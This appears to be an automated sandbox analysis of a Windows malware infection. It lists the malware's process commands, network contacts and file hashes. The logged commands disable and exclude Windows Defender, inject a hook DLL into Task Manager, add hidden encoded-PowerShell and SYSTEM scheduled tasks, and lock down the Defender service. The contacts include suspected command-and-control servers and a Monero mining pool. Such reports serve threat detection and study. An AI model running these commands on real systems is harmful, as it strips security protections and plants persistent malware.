C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEpeTTxFW" /SC once /ST 02:38:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEpeTTxFW"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEpeTTxFW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:37:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe\" KS /UIsite_iddOA 385119 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe KS /UIsite_iddOA 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\sbRilY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\KwQOyyo.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\egkYJiN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\OdXXSzc.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\NkfDFkS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\XkbSAqs.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 02:18:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\YwdzMUli\xvbbcMC.dll\",#1 /dpsite_idNTH 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YwdzMUli\xvbbcMC.dll",#1 /dpsite_idNTH 385119

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YwdzMUli\xvbbcMC.dll",#1 /dpsite_idNTH 385119

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
TR 185.216.70.222:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 105.134.101.95.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 254.111.26.67.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.42.65.92:443 watson.telemetry.microsoft.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 13.89.179.12:443 watson.telemetry.microsoft.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 12.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 13.89.179.12:443 watson.telemetry.microsoft.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 96.134.101.95.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
US 8.8.8.8:53 34.26.214.95.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 13f6ac50-a5ca-4baf-b054-cacb1b4166ca.uuid.allstatsin.ru udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 datasheet.fun udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
US 8.8.8.8:53 server2.allstatsin.ru udp
US 162.159.130.233:443 cdn.discordapp.com tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
BG 185.82.216.104:443 server2.allstatsin.ru tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
BG 185.82.216.104:443 server2.allstatsin.ru tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 35.81.204.150:80 api5.check-data.xyz tcp
US 8.8.8.8:53 150.204.81.35.in-addr.arpa udp
BG 185.82.216.104:443 server2.allstatsin.ru tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 142.251.125.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 127.125.251.142.in-addr.arpa udp
FR 51.159.66.125:53 dtmufsb.info udp
BG 185.141.63.172:80 dtmufsb.info tcp
US 8.8.8.8:53 172.63.141.185.in-addr.arpa udp
US 8.8.8.8:53 125.66.159.51.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.0.0.0.0.0.4.d.7.2.4.f.9.3.3.ip6.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp

Files

memory/2480-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3328-1-0x0000000000D30000-0x0000000000D46000-memory.dmp

memory/2480-2-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F78F.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\F78F.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\F899.exe

